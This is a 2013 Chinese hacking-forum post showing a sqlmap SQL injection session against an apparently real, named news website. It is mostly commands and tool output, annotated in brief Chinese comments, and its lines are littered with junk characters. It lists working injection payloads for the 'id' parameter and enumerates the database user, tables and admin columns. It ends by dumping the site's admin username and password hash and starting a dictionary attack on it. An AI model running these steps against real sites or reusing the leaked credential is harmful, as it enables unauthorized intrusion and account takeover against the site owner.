找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2309|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 w) n5 C# r" D% v* X% Yms "Mysql" --current-user       /*  注解:获取当前用户名称1 s1 A1 L. H+ x; ~+ F
    sqlmap/0.9 - automatic SQL injection and database takeover tool- u2 n7 j2 s1 r% x/ D9 b
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    % S) r$ `, ]- S( ^5 k( Q+ {, S[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# k4 G3 o; }0 `4 X" |
    session file" `' u! P; M1 \* N4 a; f0 V
    [16:53:54] [INFO] resuming injection data from session file
    , C- p, ^$ _2 _" C: }0 z' Q[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. D2 m# D: q& _# _) d
    [16:53:54] [INFO] testing connection to the target url
    6 n* a5 Q( A) s3 L, y& y& F1 b' zsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ) |1 Z! {2 u# g3 u  Bsts:
    & M4 I4 k" N: @4 R/ C---
    2 q7 S' v7 F2 y+ X) h8 x, OPlace: GET+ X3 b& }$ l% v$ @: P+ U" V. @
    Parameter: id1 k/ w$ s- w9 L0 U9 H
        Type: boolean-based blind
    + U% \$ z, U' G    Title: AND boolean-based blind - WHERE or HAVING clause
    ! k/ k' w! s1 a8 T$ f  ^- K$ A    Payload: id=276 AND 799=799
    ! @% W4 y& X$ N3 a3 V+ t8 X3 M8 |    Type: error-based9 |. ?9 |. p( ]1 L7 X  p
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 a6 F6 N# h- P/ g7 U4 w' }7 }' q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ' a- f$ F. i  M5 v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) O. R9 o8 g0 w5 {5 U7 `
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    & Q! m# T; \! ^2 n2 O4 B0 i    Type: UNION query
    ( F. \: D; K8 j2 \    Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 s) g1 K, {* O" z    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 ~9 z  s9 H5 Y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; p1 K: B: j) j  k& c# bCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    " h! _6 O9 z) i( c4 o8 r' m    Type: AND/OR time-based blind
    ! S3 Y2 v2 c9 A    Title: MySQL > 5.0.11 AND time-based blind
    ( e3 }8 S+ y+ Z6 `    Payload: id=276 AND SLEEP(5)
    3 r" x1 ~$ ]$ \, S' U) B---, O" ~4 D/ {& W/ B" }
    [16:53:55] [INFO] the back-end DBMS is MySQL
    8 d3 _6 W# p( cweb server operating system: Windows; L/ U0 w+ x" E8 p
    web application technology: Apache 2.2.11, PHP 5.3.04 i$ \% a" \; G3 W4 C: J
    back-end DBMS: MySQL 5.0
    # H7 G! U) C3 {% F9 d. k: P+ C- v[16:53:55] [INFO] fetching current user5 N6 e. p  ]  k9 }' w2 s0 w
    current user:    'root@localhost'   - G' T$ s0 v9 ]" U; G7 G
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* ^  D: d" Y9 N* u5 P/ O, U; C
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    8 N; ^, M# C1 m/ C( v! m6 v
    - F! u. u' T- E1 N/ ]2 SD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, J$ o: M; H! i* _
    ms "Mysql" --current-db                  /*当前数据库
    1 p) H& L* f' f/ K    sqlmap/0.9 - automatic SQL injection and database takeover tool
    . H" ^  K# ~* u, E  p# w    http://sqlmap.sourceforge.net
  • starting at: 16:54:16) z# P8 U6 g. @+ e! U
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    9 U; E+ G# a4 f/ O session file
    ! \  D! c$ \$ V- A: J. D[16:54:16] [INFO] resuming injection data from session file8 u# i( P- P1 B* m! `3 g" g& b# \
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    9 `/ Q5 B3 A) M[16:54:16] [INFO] testing connection to the target url
    ; y3 H4 u* ^4 D. bsqlmap identified the following injection points with a total of 0 HTTP(s) reque2 w* f+ Q+ n3 L/ p
    sts:: @: f. W( f3 @% C6 D
    ---
    & W+ V' M# f7 s- M! [Place: GET
    & V( T; F: F; i) ~Parameter: id
    ( X( e* r. h4 J9 ?4 Z    Type: boolean-based blind
    ) h: c$ W  N% u9 q6 Z6 B    Title: AND boolean-based blind - WHERE or HAVING clause6 K* u, G6 ~( w/ R
        Payload: id=276 AND 799=7995 Z8 C/ h# x2 b$ a# y! s
        Type: error-based$ K: C4 n0 T" i$ N
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 c) F5 d0 E. B) ?1 t  V
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    * r! ]5 n2 {% @  ~, I120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + D4 H/ k' B3 a  k8 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); ~2 c7 ]+ _/ i/ p2 }
        Type: UNION query  d: M$ T: T0 B
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ) E! m! H8 Y4 V    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    - y+ W" g) @( J6 I( R$ e3 r(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' `' s' z4 H2 z- U. ?3 T/ |# \
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: n3 R- h# I- \8 s3 y
        Type: AND/OR time-based blind
    " H2 ]% ?4 k; O1 z  q0 x, t    Title: MySQL > 5.0.11 AND time-based blind
    & q- K4 E# }  z0 ?: M    Payload: id=276 AND SLEEP(5)' S. K+ j5 y1 N
    ---) z- g+ |1 V8 }- W
    [16:54:17] [INFO] the back-end DBMS is MySQL+ y9 O/ R8 l2 c3 y1 \
    web server operating system: Windows
    3 b4 {8 X+ o  `7 }. R3 C+ ~% _8 Mweb application technology: Apache 2.2.11, PHP 5.3.0' A& R2 f, V0 f4 }" v) `" Q% t1 b
    back-end DBMS: MySQL 5.00 n  ?2 Y% b2 a- v$ L6 O
    [16:54:17] [INFO] fetching current database& _8 e7 L& W& b# f9 d0 m, O
    current database:    'wepost'
    ( i8 _7 h+ N; H6 c1 O[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: G1 g0 t8 d; ^# H
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    ; Y, a0 T: G: p6 JD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 V$ w  V7 g7 V) |. [+ j$ f5 W. P
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名; W3 M+ R% ?; p( E, P* V
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 Q2 D! ?) _1 J$ H8 C8 b    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    + r) \) j8 F4 b[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    & f/ v* S  M7 v: {$ [3 Y& [ session file: C  Q# f4 l% B0 a5 v% \. g( f
    [16:55:25] [INFO] resuming injection data from session file
    4 T- _' K0 d  S. n! K[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    8 Y2 w3 \  a6 c9 e[16:55:25] [INFO] testing connection to the target url4 B( U6 y) p* P0 W- u
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque, _) `$ ^" h) d! @, U
    sts:' M( e5 z; V2 Z  L) R
    ---' C! Z8 w% {2 T" m
    Place: GET. G! G/ n+ L6 o; D% K6 {  w% t
    Parameter: id
    . }  q  H" \2 B" ?9 I- U8 J    Type: boolean-based blind
    3 J) w* F8 K: J/ N# e* l) v    Title: AND boolean-based blind - WHERE or HAVING clause
    8 [! G/ D* X5 s+ E/ Q; f    Payload: id=276 AND 799=799
    + y6 [9 C% E& m! n' }: \    Type: error-based( G) D  ~1 R- R
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 a0 `. N, L* N. @$ }; r
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% l) V: n  k6 b- G6 {+ ^) G9 T
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( P4 S3 p) I) [' I$ \& t) j( c
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 d" G! x& O- D
        Type: UNION query+ Q$ b% {( ?( H, Z
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    & G6 Z: A' x" E% W. X    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * c1 Q6 U; N1 J7 k+ ~2 U: _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    $ Q- @0 t5 t1 d. N& X! DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## O/ G& }9 c4 r9 q# D" h
        Type: AND/OR time-based blind6 c: J0 b, ^/ O3 r8 w
        Title: MySQL > 5.0.11 AND time-based blind  Y1 L! L( }3 r' H; ~1 T1 q
        Payload: id=276 AND SLEEP(5)' s- l! \" ~# U/ v0 }* E4 F2 V3 d1 S
    ---; ?& R- z. m& ?& T8 Q& H: Q
    [16:55:26] [INFO] the back-end DBMS is MySQL5 ^( `7 l0 l! t1 W# v
    web server operating system: Windows5 X6 q. ?" D% d' b) N
    web application technology: Apache 2.2.11, PHP 5.3.04 Y2 ]; u, b' L" C1 i$ A
    back-end DBMS: MySQL 5.0, D1 C0 L8 h2 ?2 L+ ^$ z9 D
    [16:55:26] [INFO] fetching tables for database 'wepost'
    3 F  T) r+ F  n6 Q: n4 t[16:55:27] [INFO] the SQL query used returns 6 entries$ c/ y1 I( Q1 i: H/ D
    Database: wepost
    5 d2 J9 d& M4 S- C4 O" m" r: \. p[6 tables]
    1 @! F3 V1 @' F$ B$ [1 G) k4 q+-------------+
    , V, p, r5 V  M% |7 j9 y| admin       |- e1 N" o  `! p; i5 a% U
    | article     |. s  S3 w3 u, M
    | contributor |. h, l: |6 T/ [& Q3 {5 H# X
    | idea        |
    & |" D' V/ m: @* J) || image       |
    3 H8 e* U$ v- H- u5 s& ~) w| issue       |& U7 b, ?- E0 x0 U5 f
    +-------------+
    # {/ o3 e, ?3 C& `8 I[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    . A$ z. C+ _& Y$ qtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    3 h+ Z2 F8 O1 a. M; @" F1 t. Z/ b* Y  @! [! `
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    $ P% G2 I8 T/ r+ |3 h1 Qms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名- v, S: z$ Y* R* W4 T
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ; q, M! g3 r$ F+ ~    http://sqlmap.sourceforge.net
  • starting at: 16:56:06- m4 a! G2 }, I+ X$ |# B7 N8 n0 l
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    % Q0 k, z$ D$ K7 d4 a$ Msts:
    : n+ O7 D% \3 S0 F7 O---
    * U9 M# n( M' K9 ~' q; ^6 vPlace: GET
    " _% X) n0 R3 K! m3 k# z+ SParameter: id# i# b& O5 y( |- g" t2 c$ M; T" ]
        Type: boolean-based blind) W  v* w5 y( k
        Title: AND boolean-based blind - WHERE or HAVING clause
    ; _/ j2 H) o4 N! U% [$ b    Payload: id=276 AND 799=799
    9 E% S  R' Y- n( t$ X    Type: error-based1 A6 ^8 t3 ?- W% S7 D, b& B) c
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; D, ]0 {: }8 R6 \; f$ c7 y
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 w/ Y0 h9 }% ?( L: H. Y
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( J" y3 K& q5 X7 k3 T9 d* [; m
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    : A: P; V" `. ~: P% Z5 w  Y2 z    Type: UNION query; K, E" Q. q. l0 ]* L3 V! I( m
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ) m7 f2 }% m; n- `5 q1 H$ \    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 \% ~6 Y1 Y/ b/ I
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ u/ p$ Q9 S  n6 o2 P& P% U- [
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 x: x2 r0 \7 u5 [" b" q* B6 i
        Type: AND/OR time-based blind
    . d1 g. k, [- G2 Z4 b4 N9 C7 [    Title: MySQL > 5.0.11 AND time-based blind0 l& M2 f, Z  M: s5 j
        Payload: id=276 AND SLEEP(5)# n# |6 J5 A* y0 k+ D
    ---0 D5 y8 m- C' H' Y
    web server operating system: Windows
    9 l" @. \3 P: o' ]web application technology: Apache 2.2.11, PHP 5.3.0
    ! b/ f9 K) Z! h/ C/ g& @back-end DBMS: MySQL 5.0
    1 T- N1 q1 m2 j. Q8 L[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se, P$ Q0 V/ j& A
    ssion': wepost, wepost
      x( \9 Y/ f, V8 g8 o3 M, qDatabase: wepost2 f. l7 k/ ?) e, h. [' A8 O
    Table: admin, k! ?) f7 R+ R
    [4 columns]- }2 V* @/ G- S- \/ b. R9 o
    +----------+-------------+
    0 j; S, W8 h( x( R6 A+ O  r# {, u| Column   | Type        |! i6 x" o$ G4 |) E
    +----------+-------------+
    - w6 c. {( ^5 `  ]. v7 v2 Y| id       | int(11)     |7 [! S$ m  {: S2 r
    | password | varchar(32) |1 l5 k& B3 B- q$ C3 s
    | type     | varchar(10) |
    ; h& e5 i& q  |$ M3 J; _0 }+ E| userid   | varchar(20) |: L% I& t# H* v% e: D6 Q" x: Y
    +----------+-------------+- \% I2 T. Z. r/ J1 v
  • shutting down at: 16:56:19" T* c2 B. Z" q$ G" _

    ! n, l: q2 x3 ?% w2 B; WD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ' z3 |$ ?/ Z9 w0 |: r% cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    $ u, u6 u! G" X+ U' Q6 f    sqlmap/0.9 - automatic SQL injection and database takeover tool
    % k8 [4 X6 h, _3 e, h* X    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    9 q% C; y( \# v* K; Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    : p8 Z) I5 |6 n, D6 T+ [0 Csts:/ v* u' e" i$ x7 S0 A
    ---
    7 \: D. w3 A, Z! U! T2 |Place: GET
    7 `0 s5 \' N7 e) Z1 ]- X+ b3 ]Parameter: id
    + @4 r2 _2 r& N& P* t    Type: boolean-based blind: `1 T5 M3 y7 v; X! x- a% a6 V
        Title: AND boolean-based blind - WHERE or HAVING clause- H& p. r' S" @7 m2 @+ n3 [8 Q
        Payload: id=276 AND 799=7994 z7 B+ O5 ?1 c2 h9 r: l. P
        Type: error-based- @- e+ p4 {8 u6 T9 T! x. V3 [
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# b+ r* l- ~8 `7 ?
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ n* Y) S* u& `# I% [  ^
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # ]9 {0 d1 J% X* h& F1 W8 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    4 p% ~3 c6 t9 Z    Type: UNION query2 D. w+ w0 G4 S$ ?0 S
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    & p8 ~% v  l* R3 d1 n7 q    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& s( b; n1 e, n* I0 S3 o
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    6 r  |  @5 o' B1 dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ {7 H% B: r0 K
        Type: AND/OR time-based blind
    5 c# M. F4 e" f2 A+ J, @7 q- T" T    Title: MySQL > 5.0.11 AND time-based blind* L" E4 w) T5 J- z5 E/ J# T" ], D
        Payload: id=276 AND SLEEP(5)
    . L0 c5 Y' |' R: x9 {4 K---
    ! [$ C& ]* B. z8 b. ]0 Hweb server operating system: Windows, X% P  i5 m; A9 L
    web application technology: Apache 2.2.11, PHP 5.3.0" z. I! G0 q- Z/ z7 l1 N" Y
    back-end DBMS: MySQL 5.07 D. \5 M7 F4 R# Y5 S7 w0 }
    recognized possible password hash values. do you want to use dictionary attack o
    0 \  x6 K5 f( |0 F$ l5 Vn retrieved table items? [Y/n/q] y
    - B5 g8 e: e! F' T' Fwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]- t# ^9 f9 s% T% P! R1 l3 Y$ v: Y. H
    do you want to use common password suffixes? (slow!) [y/N] y* c) I( n( r. i2 J
    Database: wepost
    : O( x0 A# v$ z+ G/ P9 |Table: admin0 [+ c% M/ B% T7 q3 U! x3 ?
    [1 entry]6 j# v; Z: M7 e: o8 A7 o
    +----------------------------------+------------+! p, {5 r- L& A. v' K" n: V
    | password                         | userid     |" Q3 G1 d! q- O  t& Y/ M& m
    +----------------------------------+------------+6 [! K/ ~) z  U1 O8 x
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
      f9 L2 ~" x" D* @6 g# C; S. {% K+----------------------------------+------------+
    9 ^4 [& z/ A2 B4 _
  • shutting down at: 16:58:14: {5 u$ F6 A: P( Q/ k4 i* W

    5 g9 z- X* i2 qD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表